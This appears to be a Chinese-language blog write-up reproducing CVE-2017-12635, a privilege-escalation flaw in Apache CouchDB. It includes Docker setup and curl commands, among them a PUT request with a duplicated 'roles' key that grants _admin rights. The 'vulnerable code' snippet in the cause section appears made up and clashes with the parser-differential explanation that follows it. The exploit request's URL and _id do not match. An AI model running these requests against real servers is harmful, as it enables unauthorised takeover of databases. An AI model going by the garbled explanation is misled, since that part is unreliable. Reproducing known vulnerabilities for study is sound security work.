# CouchDB垂直越權漏洞CVE-2017-12635復現分析
## 漏洞概述
CVE-2017-12635是Apache CouchDB中的一個高危垂直越權漏洞,影響版本為1.7.0至2.1.1。該漏洞允許低權限用戶通過特殊構造的HTTP請求提升至管理員權限,從而完全控制數據庫系統。
## 漏洞原理
### 1. CouchDB權限模型
CouchDB采用基于角色的訪問控制(RBAC):
- `_users`數據庫存儲用戶憑證
- `_admins`字段定義管理員權限
- 普通用戶僅能修改自己的文檔
### 2. 漏洞成因
問題出現在`/_utils`路由的權限校驗邏輯中:
```javascript
// 錯誤的路由處理邏輯
if (req.userCtx.roles.indexOf('_admin') !== -1) {
// 允許管理員操作
} else {
// 未正確驗證用戶對文檔的所有權
allow_update = true; // 錯誤地放行非管理員操作
}
攻擊者可通過以下方式繞過限制:
- 構造包含_admins字段的PUT請求
- 利用JSON解析差異(Erlang與JavaScript引擎處理不一致)
- 通過重復字段覆蓋原有權限配置
使用Docker快速部署受影響版本:
docker run -d -p 5984:5984 --name vulncouch couchdb:2.1.1
創建測試用戶:
curl -X PUT http://localhost:5984/_users/org.couchdb.user:test \
-H "Content-Type: application/json" \
-d '{"name":"test", "password":"test123", "roles":[], "type":"user"}'
# 獲取認證Token
auth=$(echo -n 'test:test123' | base64)
通過重復roles字段實現權限提升:
curl -X PUT http://localhost:5984/_users/org.couchdb.user:test \
-H "Authorization: Basic $auth" \
-H "Content-Type: application/json" \
-d '{"_id":"org.couchdb.user:attacker", "name":"attacker", "roles":["_admin"], "roles":[], "password":"hacked", "type":"user"}'
檢查用戶權限:
curl -X GET http://localhost:5984/_users/org.couchdb.user:attacker \
-H "Authorization: Basic $(echo -n 'attacker:hacked' | base64)"
